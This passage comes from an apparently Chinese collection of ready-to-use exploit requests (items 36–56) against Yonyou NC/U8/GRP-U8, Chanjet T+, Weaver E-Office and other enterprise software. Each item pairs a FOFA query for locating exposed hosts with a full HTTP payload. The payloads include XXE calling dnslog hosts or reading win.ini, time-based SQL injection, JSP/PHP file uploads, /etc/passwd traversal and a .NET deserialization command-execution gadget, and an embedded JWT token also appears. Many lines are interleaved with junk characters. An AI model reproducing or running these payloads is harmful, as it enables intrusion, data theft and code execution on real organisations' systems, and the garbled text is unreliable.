User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info8 B% c% y% z7 ]
Accept-Encoding: gzip, deflate
( }& y* l7 n4 r3 U3 X: H- sAccept: */*' I3 L+ R; X9 z
Connection: close
. U. \8 O! N' S% IaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
- W5 R& C" H3 [! T) x. X. V8 K) g) zContent-Length: 190! U6 u4 h( I" P" y
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0! f. t1 g: b- X# n9 Q( ?+ U
" s0 K8 |# h# i--fd28cb44e829ed1c197ec3bc71748df0' M. U) a6 L& G; O- R" J" S# Q# y5 }8 K
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"( m# }5 a1 H; P6 O1 n1 n" F
. a$ X9 j9 b7 i' E& @5 Q) u- p) O
<%out.println(1111*1111);%>
: ]+ I* t/ Y- q4 }2 Q--fd28cb44e829ed1c197ec3bc71748df0--
9 g6 q2 e0 h3 r8 I
. v$ d! u1 L% f
8 O( C; J: B" q3 y$ K36. 用友NC-Cloud soapFormat XXE
7 e) H3 H; M8 H0 z8 q3 DFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"9 N: K; i7 d; V/ C& d M
POST /uapws/soapFormat.ajax HTTP/1.1
3 v/ n4 P; N" U7 h zHost: 192.168.40.130:8989
2 k% D& d2 h7 c; IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
. X* n3 ?* o8 M+ a/ T) KContent-Length: 2635 l, ?: h6 G2 U5 S4 z) f1 ^5 |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 U6 [( k. E/ z
Accept-Encoding: gzip, deflate: q3 l7 p% S. D' m$ p
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ l( u- h$ l" W7 K; n4 sConnection: close
6 e& q: u. H8 i% S- d6 QContent-Type: application/x-www-form-urlencoded
) g8 Y/ g S* q& ~2 k6 zUpgrade-Insecure-Requests: 1& P' \8 t3 r& m* Z
# S; l& k6 k- @) e+ L
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a0 h6 ]- C" z4 y) [* r5 H+ \
! w5 \ ?9 H; ^" @* |. K- b$ \2 b$ i1 i6 `$ H0 v( p: E8 Z5 R% y
37. 用友NC-Cloud IUpdateService XXE
. g- R! q3 E' j4 t+ bFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
9 e7 @" o$ D j4 T6 lPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1) n; }( g0 y' i- Y) v8 ?& d
Host: 192.168.40.130:8989
+ {) O' R6 A0 M6 K% oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
5 |6 p; G, d! T. z; d0 f0 D L3 K0 `Content-Length: 421! `0 T& k, ]/ r h4 R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.92 ~; y# z* Z9 M
Accept-Encoding: gzip, deflate
2 Q1 }5 P1 m* Q' O: P CAccept-Language: zh-CN,zh;q=0.9! Y: U$ y, ^, C/ D4 k6 W
Connection: close
" J$ h' I6 U K) v3 Y3 s9 d1 @" `Content-Type: text/xml;charset=UTF-8
F* Z2 o# s& H! I. ~( SSOAPAction: urn:getResult
8 T2 ?( m# [5 L& }8 _" WUpgrade-Insecure-Requests: 1
, W/ G9 b" h% o. o; V: J6 t( I* E: @0 [/ N
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
& |3 ?. L3 D- x: a<soapenv:Header/>% a; R4 f0 Z2 |2 r, y* ^
<soapenv:Body>7 t7 h( [1 K$ g- w: U0 j
<iup:getResult>4 c. ?0 M0 H% c7 }% t
<!--type: string-->
. ?' Q `% l2 }<iup:string><![CDATA[
$ y; O- f) N( c# a1 {<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
b( B9 [9 m6 B+ f<xxx/>]]></iup:string>
4 t3 o2 O* O+ O1 b2 U8 K( r</iup:getResult>5 M4 D7 `! O0 x3 }
</soapenv:Body>
1 M- V3 U& ~4 O4 u</soapenv:Envelope>9 u* w3 d; w; I
3 a8 i+ J: ~) V2 V% e. P
) w( l* c( ^% w' u0 U1 G$ f8 C9 F3 [0 z8 _# e
38. 用友U8 Cloud smartweb2.RPC.d XXE
+ w2 }) c3 d: QFOFA:app="用友-U8-Cloud"
8 y" _7 a4 O5 Q( }8 wPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
2 ~$ A9 ]" E& K Q# FHost: 192.168.40.131:8088
% S: v U, F! N0 TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
3 T) j3 A$ @7 t9 I: X' e" U( UContent-Length: 260
/ }& w) v4 e1 b8 q: ?0 s) AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
* x. {4 D9 v2 eAccept-Encoding: gzip, deflate9 Z) J- n+ [: @6 h& O
Accept-Language: zh-CN,zh;q=0.92 [4 e8 l( G# k' {: K
Connection: close
+ y- s2 ?7 T& F' N( xContent-Type: application/x-www-form-urlencoded
" l7 w. } e6 i/ G' w7 E' I' J; e7 t! V$ N, D+ ~1 ]
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
& }$ \) X: X0 d0 R6 V8 R! t+ h& I3 w# d8 G( D& N; R
1 A+ Q, E/ V3 L3 q# C+ U9 r
39. 用友U8 Cloud RegisterServlet SQL注入7 S; t) C1 v0 e& c5 @
FOFA:title="u8c": K- J- l3 m4 c2 w, J6 j
POST /servlet/RegisterServlet HTTP/1.1
) Z" U% `+ {) M5 B( J. j9 j3 h7 JHost: 192.168.86.128:8089
1 E+ k" k/ W9 U5 k/ j( E8 OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36% G& c* m1 p8 U( x
Connection: close
; K: N7 c; S6 eContent-Length: 85
' b3 p, G! M; ~$ EAccept: */*
! i/ s& T" z8 j' q4 {& h4 dAccept-Language: en
( r8 `. }& [* A+ s9 T5 hContent-Type: application/x-www-form-urlencoded. P) g6 ?3 q$ A0 ^0 w) i3 t
X-Forwarded-For: 127.0.0.1
6 r' w9 Y3 V" K! wAccept-Encoding: gzip
# k, W: m7 Q! c9 `& H2 G
2 [' D. p% |# c' U3 }8 F& nusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--# ?: b8 M- o4 Z# e4 w [6 K
5 W' Z7 |0 e- I- S5 U& v( f
$ {5 p, n, n( f/ E$ t40. 用友U8-Cloud XChangeServlet XXE/ j7 d% v1 j3 O7 ]+ t3 Y% t
FOFA:app="用友-U8-Cloud"
! o, o. N3 v" g/ GPOST /service/XChangeServlet HTTP/1.1
3 S0 t0 A0 L, m' N: u; C5 o: `) ~. Z; c) qHost: x.x.x.x
+ l _( ^# c: @* E' ]User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36- V; S7 T5 b# {4 w
Content-Type: text/xml
8 R! R- s! f) E3 O' z9 j, B# M6 @Connection: close
, j7 c! Z2 x5 x; a+ K
! v$ a% ]2 y2 I' ?( N) d! c6 T<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
9 y; W5 E3 N! d1 F, j2 T2 D
B( [% q3 Y1 O
: o" ^* h& B( O2 {4 a f. i& _41. 用友U8 Cloud MeasureQueryByToolAction SQL注入% @% h, ?( W0 h* N* o- |
FOFA:app="用友-U8-Cloud"
3 I3 ~6 d n8 k# D$ c$ FGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.17 r4 C Y' q2 J2 c( y% m
Host:
* {: |1 w3 e8 O+ i' ~' x1 u9 O; z7 |% nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 ?" ?. V1 y1 {
Content-Type: application/json
9 ?. d; u* n) t }- U9 IAccept-Encoding: gzip
0 d5 I. f7 [+ l) L+ |( d8 F" v. pConnection: close
O/ Q6 e+ h l0 C* @- Y3 ?; l* V4 f' q* B% m
/ I \# x3 _. [) B. n* i, {1 V2 [
42. 用友GRP-U8 SmartUpload01 文件上传. v$ } `; F+ j/ a/ p2 m
FOFA:app="用友-GRP-U8"9 w$ S4 {' e- n+ Z8 v# \
POST /u8qx/SmartUpload01.jsp HTTP/1.1; d& L2 K- m" Q- ]$ h- b# |
Host: x.x.x.x
3 y: F8 O* h& q/ y# u% bContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt" T8 n! V7 E8 ^1 k0 f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
0 h" h- P$ H9 r& D0 G( G1 b1 U. Z& W( ~
PAYLOAD
0 D, E4 Z6 S4 h- Q+ f# Y; [0 N- ~- X' x
2 j$ o+ N/ s2 s( H9 E( B9 @3 M. ~
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
+ A! ]+ B% p0 Y' [; v9 J: g; C( D2 d& c: }+ O: t9 v1 Z8 J8 R
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
2 d0 Y/ G6 \4 W; N) C/ X4 nFOFA:app="用友-GRP-U8"
) N; k O3 h; w2 V7 jPOST /services/userInfoWeb HTTP/1.1+ ]# V2 j7 S; h6 C
Host: your-ip
* { k' D% K6 w- z$ b0 `8 AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
! u* I# R- G7 i) F6 p" [* jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% B2 @$ x0 ]- Q4 r/ JAccept-Encoding: gzip, deflate
5 d5 l/ v5 `6 N% JAccept-Language: zh-CN,zh;q=0.9
0 l7 h7 z( {: ~5 k! ?9 hConnection: close6 S3 Z$ o0 y5 \. q9 t- O. s
SOAPAction:6 M; C5 L; o: d. ^% W4 B! Q
Content-Type: text/xml;charset=UTF-8, w2 ~! c1 |) v7 U5 @" \9 H
0 C1 I2 |" l: I M' Y# J7 b+ B<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">1 C! F) [! u4 X0 l* S
<soapenv:Header/>2 e: Q; }' m, T- N! m0 l
<soapenv:Body>- Z7 L/ z( H- F& K2 j
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">" l, b% y! `, o) p
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>( p$ v9 t3 W& q- x/ W- J! V- A6 a
</ser:getUserNameById>
2 \9 n4 s4 B% @ </soapenv:Body>+ e" w z; W9 m( u, d
</soapenv:Envelope>
- c- b. D0 v. f, S$ R0 d$ J2 r# T
; s0 L o- P( L
, u+ a9 C! R6 O' a+ N44. 用友GRP-U8 bx_dj_check.jsp SQL注入
% S0 Q1 F5 Z: D5 S3 ZFOFA:app="用友-GRP-U8"7 ]' |6 i% E& k! V3 T0 b
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
9 Z* h! i; g$ p9 b; iHost: your-ip. ?! T$ U; p1 o& V v) }& x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
6 }) u4 d5 p7 E, |# @, BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 V+ c0 U% {5 c5 `Accept-Encoding: gzip, deflate
7 {* T1 \9 S4 x) @9 r4 g9 a! kAccept-Language: zh-CN,zh;q=0.9
/ @, E( _0 q8 ?$ U4 [+ |Connection: close+ }8 d# B/ g# z4 L1 P7 A) O
, \" C+ C4 F/ c
3 t% Y! f( R" f2 m% ~) W45. 用友GRP-U8 ufgovbank XXE; P9 U( o" S _5 d& R- U+ D9 M4 |
FOFA:app="用友-GRP-U8"
/ x8 G+ b2 J% F/ P/ O' z# J6 lPOST /ufgovbank HTTP/1.1
' J. w2 S& _" O) z4 r8 @Host: 192.168.40.130:222
7 Y* ^2 }$ Y9 a8 V( t, jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0* I+ ?1 O2 p: A7 S1 s
Connection: close
! [0 P, Q+ l# N) J$ ~6 EContent-Length: 161. r) N2 F5 }8 X" x# W, W5 h$ X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& C6 R0 c1 o" j, t8 I+ e v
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 Z/ E( V6 S) k! {Content-Type: application/x-www-form-urlencoded
# ^( l W. Q) tAccept-Encoding: gzip2 A. P# q$ F: h( ]' ~, g
% d2 C) y* X; T# R/ R7 F4 EreqData=<?xml version="1.0"?>) l! e0 {7 j n9 ?. X) i' e
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest w, \, F7 J, ^. r9 [
4 m" F. O2 t( J! g3 [7 @) e9 H7 v
4 K6 z! ?) m, M5 |3 u
46. 用友GRP-U8 sqcxIndex.jsp SQL注入: r @ z' x- ~5 h9 {
FOFA:app="用友-GRP-U8"
% c: R$ Z3 Y$ L2 T' KGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1( ]0 ^. J4 n5 m; _4 J
Host: your-ip
- m4 [: a1 e' ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36* n: |; J) J0 D$ a( F* {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 q9 w/ T: W, X/ w) P+ O
Accept-Encoding: gzip, deflate) r. v$ h7 D4 ] ^. w& O
Accept-Language: zh-CN,zh;q=0.9
( l6 S) `$ t8 n; ^, S) _# yConnection: close
6 {; m7 B6 H3 u8 X' M# J
0 I. i5 B! `' g$ y: e
1 ^( N# X B' `# u47. 用友GRP A++Cloud 政府财务云 任意文件读取
5 ?( d9 F8 u8 |- I. [FOFA:body="/pf/portal/login/css/fonts/style.css"
# D& N2 A: J9 f- ~, p; o L& M+ JGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
0 D2 A9 ]6 l/ _ xHost: x.x.x.x$ N2 Z0 i! Z. {
Cache-Control: max-age=0
' d9 I$ f% i! {0 X2 {Upgrade-Insecure-Requests: 10 r- s# m- y& G' c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.364 L0 \/ s( Q! e& B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ A% h, e0 M; K# {4 A* ^% Q. {Accept-Encoding: gzip, deflate, br/ G( ~3 C! B% Y1 {
Accept-Language: zh-CN,zh;q=0.9# x% y/ ]5 v0 D
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
& l7 \% n1 h2 h/ @1 c' I2 QConnection: close# b. `3 V+ u, R% s0 _* l& N8 l" L! t
. G X1 G; X5 D8 J. T- c7 s2 i( n2 U- P b7 E
$ a% o% e, X4 t9 K0 h9 o48. 用友U8 CRM swfupload 任意文件上传
9 W2 h; r/ I2 B* |4 ~# _FOFA:title="用友U8CRM"3 J5 O' O; _4 j7 J2 ?
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
6 e* }9 S }: M6 V1 ?4 M" y+ Q" R ]8 KHost: your-ip$ ~, T7 j8 z/ ?, k3 I t6 S" Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
, h3 _4 m1 n" D+ G; J1 gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ k( l2 a2 Z. U2 n2 kAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# v4 P# }4 h; g# q$ FAccept-Encoding: gzip, deflate, m( y$ K& z6 s, U9 g# h( |% k
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855# ^7 B* f+ \- ~, E/ C
------269520967239406871642430066855$ P. x& U1 c* x& Z: R0 z7 n
Content-Disposition: form-data; name="file"; filename="s.php"
9 c+ X& B9 C; b4 D/ L, ^1231
7 |7 X( V2 v" x4 q, o# v; c' }Content-Type: application/octet-stream, N. F0 W$ X$ K' E; \/ m) E! o
------269520967239406871642430066855
! K4 H' n% y. a) d: Y* FContent-Disposition: form-data; name="upload"/ n! J( {& L2 T" m3 V) {4 M( F
upload
4 }5 m0 r3 L: w------269520967239406871642430066855--
' F/ R7 X! x/ d* Z) F+ _# b, x, V0 o& ^. g! O: ?' l( ~9 i1 v: G
! N" V9 q+ }& b$ u. t49. 用友U8 CRM系统uploadfile.php接口任意文件上传* w) i- h4 S) W& U& @+ w& x
FOFA:body="用友U8CRM"
5 d) B: t. S5 O! a* i, _
2 F+ D6 j- F2 `2 N t) ]POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.16 `" L3 f- q$ E: u
Host: x.x.x.x
9 s# }# W5 z3 j. j% rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
4 g! ?4 Y. n: e' yContent-Length: 329! K1 `# y) g5 F! q6 Q1 m( k1 R8 _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 j2 X% H* D% L2 z7 Y/ O- lAccept-Encoding: gzip, deflate. d8 N( I7 t; V& M' Z' E* Y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 z# s, b5 T6 N* e# C" t* D
Connection: close
& X! u& P5 @$ O1 |% tContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w% s2 @) a0 }! K8 R) v
& V, l4 b7 s: U% L. }7 C: M! g
-----------------------------vvv3wdayqv3yppdxvn3w& v% b$ N$ a7 b4 G1 I& \: [
Content-Disposition: form-data; name="file"; filename="%s.php "
2 e$ M0 |+ B) ?7 e8 }9 LContent-Type: application/octet-stream- d# Y9 {4 z7 D7 v' x0 X3 j
' a4 q2 P2 w' m9 K: i
wersqqmlumloqa# R: w. ~+ X9 x9 e C
-----------------------------vvv3wdayqv3yppdxvn3w! x) `- c$ I2 O! t+ s$ Z, J
Content-Disposition: form-data; name="upload"
. h; j: m, a* M8 D3 u2 |5 I9 X7 r/ x; B) \( R/ N/ s/ F( w) W0 l
upload, J6 y# [/ N. o4 T! F% u* c
-----------------------------vvv3wdayqv3yppdxvn3w--
& _5 E4 y( e& k$ ~& r
. l7 Y; ^1 `% I# L, X
2 K8 M" l( G% k. v9 w4 d7 u e4 shttp://x.x.x.x/tmpfile/updB3CB.tmp.php: c. ?8 d* s- Y1 |1 }$ _2 l1 q( c l b
9 S ]8 {4 r' t- o" J4 @1 {2 h
50. QDocs Smart School 6.4.1 filterRecords SQL注入4 k( a! u# F9 L5 e
FOFA:body="close closebtnmodal"
1 ^$ m2 T I# h8 D6 b* @5 jPOST /course/filterRecords/ HTTP/1.12 h2 m: g# h7 i7 i
Host: x.x.x.x
- h5 e5 }3 S8 _ e d3 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.369 e! H: k7 M | r7 W9 L" y q1 b5 G6 p
Connection: close
3 P7 ?5 U2 d1 K9 o% u( [- q4 MContent-Length: 2246 H; M0 f1 A! r' v3 `7 |2 h6 P
Accept: */*; `9 q* }7 l# a( [
Accept-Language: en1 r# }7 H- a, c# S1 `+ L3 t
Content-Type: application/x-www-form-urlencoded
8 ~, P4 h& m; Y: wAccept-Encoding: gzip; a$ t P0 x( _& W
. U: A& `! G% L7 R! ~8 tsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1 q+ e j7 c$ c0 R
3 _$ Q# d0 Y& a7 B& \- S4 k- V. Z
! L( Q# y3 _+ ]. L4 l51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
3 y2 d7 c3 r4 S4 j6 ~% {0 GFOFA:app="云时空社会化商业ERP系统"! l! x9 a3 ^6 Q, W7 E( W1 G
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
! _7 s# { Q7 r# P( _& G- U x$ `Host: your-ip
! q; F: z$ f) nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.368 |* @' z& f+ A: h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
: R% ^2 l4 ~+ B: h5 z! @; x$ {Accept-Encoding: gzip, deflate
1 n1 h+ T. E$ D. sAccept-Language: zh-CN,zh;q=0.9( X* n( m7 P, }( ?2 Q0 E' z
Connection: close
L0 A9 k+ E z7 U$ _" T2 X0 ?7 e0 b2 z5 f, f
' X x0 m; j: c$ f3 h
52. 泛微E-Office json_common.php sql注入. |2 e7 e& F, ?* Z$ F, H+ L
FOFA:app="泛微-EOffice"" G6 X7 g) ?8 x( ~ z/ F% x/ F
POST /building/json_common.php HTTP/1.18 y$ ~/ v8 o' K! w. k( j
Host: 192.168.86.128:8097
- w% E% ?7 h) Z8 L4 d+ f6 W9 l) m2 MUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
0 X0 s, ]& c4 N' bConnection: close2 A( C' \' ^3 K7 G/ B& }: J
Content-Length: 87
w# p7 W _2 Y+ A' g7 J5 |Accept: */*
: r$ {, R) i, ?8 n& C$ T0 ]( vAccept-Language: en) J4 Y/ l& Z0 K
Content-Type: application/x-www-form-urlencoded- M5 }0 P4 `0 H% d7 C, J& @
Accept-Encoding: gzip- Q4 ?, i z3 g4 N& d# o) {9 B
2 s1 q! ?" s7 O$ ]: {
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
* p& I @) ^$ u* c$ D* |" V* l6 M( l( _
* E% F3 Q" K. r% L4 g4 I% ]
53. 迪普 DPTech VPN Service 任意文件上传% _- y/ L7 Y9 C# |1 V
FOFA:app="DPtech-SSLVPN"3 {& }5 Q- H% W0 f5 A
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd- U) t @0 D- @/ T+ ]
% B$ n9 D. h r# Y) |: `1 w% Q& W9 n! k; S! b Y) R
54. 畅捷通T+ getstorewarehousebystore 远程代码执行3 j% Z6 S$ m: Q" i- K
FOFA:app="畅捷通-TPlus"
5 h# h0 {( M* [3 z$ \, k: F第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
* I/ _' E/ `) N7 w' V R+ _! S"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"7 g' t& b3 |* Y! g
$ T$ g& P# @. a! Z7 ]/ K$ W9 {
/ \# T! t/ p- {( A$ O) x完整数据包
! j- I" e$ w# n6 s5 Z# uPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
/ q1 ~5 }8 \' U+ g' J/ ?Host: x.x.x.x
2 k( U/ _ E. u3 c0 R& PUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F; q8 u! x/ ^9 G/ q! k
Content-Length: 5930 V% L+ n4 \4 v- m. N: ^
. H1 p# u( O- C- U* @1 J{0 q! C$ G* U5 e- S5 Y
"storeID":{6 T/ u; O4 N; y& j
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35", N9 N6 O# v! O) n
"MethodName":"Start",
1 f1 T9 @# O8 ^. Z4 D* h6 g "ObjectInstance":{+ f& K9 W# g, W( g& l
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
/ R) u& r. u- s "StartInfo":{- V _0 M# A, W3 K' E) i( y
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
w/ n N, v: ~+ z- i "FileName":"cmd",# V- l# P+ `( s( d0 N- E
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
6 i1 R4 V( \" B$ r }2 Q* `/ ]1 @& t X, E. Q! L9 B
}8 n4 e- n( H# {0 Z
}7 F. ]$ l& P9 `: `3 G: e+ L5 {
}/ ~/ D( Z; r* P, K, n7 }9 i5 W
( x2 u" M0 j% l" i( I9 ]' |; y
; a, m% _9 X/ ?) J第二步,访问如下url* p3 |, f6 ^: `. b8 N G1 u$ s% Q
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt: Y9 C5 I% @2 r& {, @6 W7 o4 F; [
" E0 k3 Q5 g% ~
) R0 ^1 l2 R. c+ r55. 畅捷通T+ getdecallusers信息泄露 I n1 X* c, ~ p5 B
FOFA:app="畅捷通-TPlus"" d* m4 t+ e* ^5 g9 U3 ]; V
第一步,通过7 |( L: {( U7 q, k+ t2 |
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
4 D+ b6 @$ Y& g# r+ u5 }7 L第二步,利用获取到的Cookie请求6 l2 G$ p- {$ \4 \: F1 X
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers: E2 u x1 V5 f( O; ^ v# A
8 Y1 I' T& w4 E# T& k6 l2 s
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE# }- m+ _. [% ]2 q$ W
FOFA: app="畅捷通-TPlus"
" q0 c$ f9 x4 S& o, K; wPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.14 v. @1 ?8 ]% z& B2 E
Host: x.x.x.x
